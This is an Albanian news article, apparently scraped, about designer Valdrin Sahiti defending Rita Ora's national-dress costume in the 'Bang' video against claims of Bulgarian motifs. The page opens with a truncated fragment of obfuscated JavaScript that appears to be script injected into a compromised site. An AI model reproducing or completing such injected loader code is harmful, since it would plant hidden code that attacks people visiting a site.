;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Motive bullgare në dukjen e Ritës? Valdrini i jep përgjigje të gjithë zërave

By

Veshja e këngëtares shqiptare me famë botërore, Rita Ora në klipin e saj të fundit “Bang” ka ngjallur debat në rrjet. Disa e kanë cilësuar kostumin e veshur nga ajo me motive bullgare, ndoshta bazuar edhe në faktin që videoklipi është xhiruar në një qytet bullgar.

Megjithatë dizenjuesi i veshjes, Valdrin Sahiti iu përgjigj zërave në programin “Ftesë në 5” me Bieta Sulon.

Ai tregoi se ka qenë në një komunikim të gjatë me stafin e Ritës dhe kërkesa e tyre kryesore ka qenë që përmes veshjes kombëtare, Rita të duket njëkohësisht rinore dhe “cool”.

“Fjala kyçe e stilistëve ka qenë që Rita domosdoshmërisht duhet të duket ‘cool’ dhe rinore. Në asnjë mënyrë nuk duhet të dukej si një gocë e cila ka marrë një veshje dhe pak e ka rifreskuar dhe po rikujton traditën e saj me në veshje të vjetër apo ‘vintage look’. Dhe në anën tjetër në asnjë mënyrë nuk do të duket seksi apo e zbuluar, meqë veshjet tona tradicionale nuk e kanë si pikë të fortë në natyrën e tyre këtë gjë”, sqaroi ai.

Sahiti zbuloi gjithashtu se klipi ishte planifikuar të xhirohej në Tiranë, por planet ndryshuan për shkak të kufizimeve të pandemisë, raporton Top Channel, përcjellë Prive.al

Artikuj të ngjashëm